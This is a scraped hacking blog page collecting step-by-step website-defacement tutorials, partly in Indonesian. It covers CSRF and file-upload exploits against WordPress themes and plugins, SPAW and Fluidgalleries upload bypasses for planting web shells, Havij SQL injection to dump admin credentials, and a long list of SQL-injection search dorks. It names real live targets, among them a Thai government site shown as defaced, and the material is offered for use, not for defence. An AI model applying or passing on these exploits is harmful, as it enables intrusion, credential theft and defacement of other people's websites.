WHO R U

สถิติเว็บไซต์


Free Web Site Counter
DSL Services

Flag Counter

บทความที่ได้รับความนิยม

My Motto

Translate

Label

DEFACE - CSRF

comments
Assalamualaikum :)
Pada kesempatan kali ini aku mau kasih tutorial deface dengan tekhnik CSRF, oke tanpa basa basi kita mulai yah :D

Bahan-Bahan:

1. Download Script CSRF
===============================================================
DOWNLOAD DISINI  Password: Lihat
===============================================================
Note: Aktifkan Java Script untuk download!!

2. Download MadspotShell Disini Extract dulu dari file Rar!

3. Cari target dengan DORK :

inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico

    4. Untuk coba2 gunakan Live Target Live Target 2

    5. Great Thanks To om Edo aka Mr. Goodday aka 007 Yg udh ngajarin :D

    6. Titip Nama .:: H4ckZ ::. | Cyber Indonesian Anonymous (C.I.A)
    Persiapan sudah selesai, sekarang tinggal kita eksekusi :)

    Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

    Langkah- Langkah:

    kurang jelas lihat gambar)

    Kurang jelas lihat gambar)
    http://www.robertcarpentry.com/wp-content/themes/pacifico/images/ ganti menjadihttp://www.robertcarpentry.com/wp-content/themes/pacifico/theme

    http://www.robertcarpentry.com/wp-content/themes/pacifico/theme/functions/upload-bg.php"
    lihat gambar)
    #Saya menggunakan SHELL dari teman saya om X Inject :D (tampilan shell akan berbeda beda loh setiap jenisnya)
    Sekian :)

    DEFACE - SPAW

    comments
    Hallo sobat, udah seminggu ini ane ngga ngepost nih. Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

    Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability Cekidot :D

    1). Pertama, Masukan Dorknya :

     inurl:”spaw2/uploads/files/”

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

    Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkansite:th pada akhir dork diatas. Jadi hasilnya begini :

     inurl:”spaw2/uploads/files/” site:th

    Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.mysite:jpsite:gov.cn etc asal jangan site:co.id yah !

    2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

     http://contoh.com/spaw2/uploads/files/

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    3). Ganti pada Bagian 
    /spaw2/uploads/files/ dengan kode dibawah ini :
     spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    Sehingga Menjadi Seperti Ini :

     http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    4).
     Tekan Enter, Nanti akan Terbuka Seperti Ini :

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.


    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    6). 
    Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    7). Selanjutnya Klik Tombol Upload.

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    9). Selesai, dan Hasilnya :

     http://www.dtam.moph.go.th/

    http://cirebon-cyber4rt.blogspot.com/2012/07/cara-deface-website-melalui-spaw.html

    Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.

    Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.

    Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.

    WP Exploit

    comments
    - Title        : Wordpress Simple-Forum CSRF Vulnerability
    - Author       : FathurFreakz
    - Google Dork  : inurl:/plugins/simple-forum/
    - Exploit      : wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
    - CSRF Exploit :
    
    <form enctype="multipart/form-data" 
    
    action="http://site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">
    
    <input type="file" name="url" value="./" /><br />
    
    Please choose a file: <input name="uploadfile" type="file" /><br />
    
    <input type="submit" value="upload" />
    
    </form>
    
    
    - Shell        : http://www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php

    Exploit Fluidgalleries File Upload ( Tamper Data )

    comments
    Assalamualaikum sobat IDCA :D

    Udah lama neh ngak kasih tutorial baru, sebenernya sih sekarang amsih UKK ane maklum ane masih bocah ^_^ tapi boat sobat IDCA tak apalah ngak usah belajar mending bikin artikel kwkwkwkw

    oke langsung aja yah ngak usah kelamaan basa basinya takutnya jadi basi XD

    Kali ini saya akan memberikan tutorial " Deface dengan Exploit "Fluidgalleries" yang saya ketahui dari temen saya si The Jackerz & Cimy .

    [+] LANGKAH LANGKAH [+]


    • Dork : inurl:/fluidgalleries/photos/
    • Bahan : Shell yang sudah direname menjadi shell.php.jpg
    Dork kembangin sendiri OK ;)

    1. Copas dork diatas ke mesin pencarian, lalu pilih salah satu target

    2. Setelah memilih salah satu website gunakan exploit
    • localhost/[path]/fluidgalleries/php/photo-upload.php
    ~> Target saya : http://www.antarhanif.com/Stills/fluidgalleries/php/photo-upload.php

    Setelah itu buka tools " Tamper Data " kalian, lalu klik start tamper 


    3. Setelah itu, pilih file yang akan kalian upload ( shell.php.jpg )


    4. Lalu klik OK, saat keluar pop up tools tamper data kalian klik " tamper "


    5.  Setelah itu akan keluar Pop Up lagi dan perhatikan di sebelah kanan ada kotak kecil, carilah kata  shell.php.jpg lalu ganti dengan shell.php 


    6. Jika sudah di renam lalu klik OK, tunggu sampai proses upload selesai jika sudah klik stop tamper


    7. Untuk melihat shell kalian terupload atau belum pergi ke :
    inget nanti bakalan ada embel embel di nama shell kalian, jadi setelah akses localhost/[path]/fluidgalleries/photos/ kalian ketik CTRL + F lalu tulis nama shll kalian ;)


    Upload sukses ^_^

    8. Tinggal tebas deh websitenya :D


    sekian tutorial yang dapat saya berikan, jika ada yang kurang jelas silahkan tanyakan di kolom komentar ^_^

    NB : Jika tidak bisa upload Php upload aja html :D

    Thanks to : The Jackerz & Cimy

    Content Created By Bimo Septiawan


    Sumber: http://indocyberarmy.blogspot.com/2013/06/exploit-fluidgalleries-file-upload.html#ixzz2WDA2cPH2

    HOW TO HACK A WEBSITE BY SQL INJECTION USING HAVIJ | TUTORIAL

    comments
    You can download Havij here

    After downloading and installing Havij SQL tool,. you have to find an SQL vulnerable site. This can be done by the use of google dorks like
    • inurl:index.php?id=sql under''
    Read this tutorial on manual sql under   '' searching for the vulnerability ''   here ...

    but for an easy go, you can just use another automated program known as sql poison . you can download  here. The main aim of sql poison scanner is to help you find a vulnerable web page by performing an automated blind search onto a search engine like google. Havij will only hack a website through a specific webpage which you know is vulnerable to sql injection.
    -----------------------------------------------------------------------------------------------------------------
    Now lets say that you have found a vulnerable weblink url which looks like this one:
    • http://www.hackyourdad.com/hisoffice.php?id=282
    1. Open havij, then copy and paste the vulnerable weblink as shown in figure


    2. Now click in the "Analyze" button


    4. After u click Analize, wait for it to find it's vulernable, type of injection, if db server is mysql and it will find database name. Then after get it's database is name like xxxx_xxxx


    5. Then go to the next operation of finding tables by clicking "tables" . A sub menu will appear  where you         will click "Get tables"  as shown in the figure below. Your may need to wait for a while before it shows         you the tables



    6. After you get the tables ,there will be a check box for "users" Put mark on it and click on the " get columns " tab as shown in figure


    7. Under ''Get columns'' list,.. just check on username and password and click on "Get data"

    8. Bingo!!! Now you have the Username and password that may be for the admin...The pass that you will get     will be in form of an md5 hash which you will have to decrypt it by using the MD5decryptor tool as shown below

    After you have got the Username & the password ready,.. You now need to find the Admin page which will give you access to the control panel (cpanel) of the website.
    To find the Admin page, Go to ''Find Admin'' , then enter the site url on ''Path to search'' and click on ''Start'' as shown in the image below

    Now get the admin page url and open it in your internet browser,.. it will take you to a page which will request for the username and password,.. Enter these details & its Game Over!!! 
    You will find yourself in the control panel (cpanel) where you will have complete control of the website, you can do whatever the hell you want, you can even deface the website if you are realy in a bad mood :P

    Private sql dorks

    comments

    inurl:group_concat username 0x3a PASSWORD from robot
    inurl:group_concat username 0x3a PASSWORD from pirates
    inurl:group_concat username 0x3a PASSWORD from obama
    inurl:group_concat username 0x3a PASSWORD from shadow
    inurl:group_concat username 0x3a PASSWORD from khan
    inurl:group_concat username 0x3a PASSWORD from paul
    inurl:group_concat username 0x3a PASSWORD from pakistan
    inurl:group_concat username 0x3a PASSWORD from hacker

    inurl:group_concat username 0x3a PASSWORD from users
    inurl:group_concat username 0x3a PASSWORD from adm
    inurl:group_concat username 0x3a PASSWORD from admin
    inurl:group_concat username 0x3a PASSWORD from user
    inurl:concat username 0x3a password from sysibm.sysdummy1
    inurl:concat username 0x3a password from israel
    inurl:concat username 0x3a password from mr.bean
    inurl:concat username 0x3a password from sysuser
    inurl:concat username 0x3a password from sysadmin
    inurl:/MyBB/Upload/inc/
    inurl:db_mysql.php
    inurl:sql.php?table=wp_users
    inurl:sql.php?table=group
    inurl:sql.php?table=phpMyAdmin
    inurl:sql.php?table=users
    inurl:sql.php?table=login
    inurl:/phpMyAdmin/sql.php
    inurl:sql.php?table=customer
    inurl:sql.php?table=member
    inurl:sql.php?table=account
    inurl:sql.php?table=admin
    inurl:sql.php?table=tblwhoislog
    inurl:/usr/local/apache/htdocs
    inurl:sql.php?table=jos_users
    inurl:sql.php?table=mybb_users
    inurl:sql.php?table=log
    inurl:sql.php?table=pass
    inurl:sql.php?table=information_schema
    inurl:sql.php?table=proxies_priv
    inurl:sql.php?table=mysql.user
    inurl:sql.php?table=collection
    inurl:sql.php?table=loginlog
    inurl:sql.php?table=menu
    inurl:sql.php?table=setting
    inurl:sql.php?table=phpbb_users
    inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
    inurl:union+select+filetype:asp
    inurl:union+select+filetype:php
    inurl:union+select+filetype:cfm

    inurl:union 4.1.22-standard-log
    inurl:union 5.0.67-log
    inurl:union» 4.1.22-log
    inurl:union 5.0.32
    inurl:union» 5.0.67
    inurl:union» 5.0.51a-3ubuntu5
    inurl:union» 5.1.63-cll
    inurl:bootstrap.php

    thk 

    ข่าวสารอัพเดท

    เด็กวิทย์คอม ยินดีต้อนรับเข้าสู่

    108-load สังคมแห่งการแบ่งปัน


    ===============
    สถานะ : กำลังอัพเดทเว็ปไซต์

    FACEBOOK FANPAGE

    HOT-NEWS

    CHAT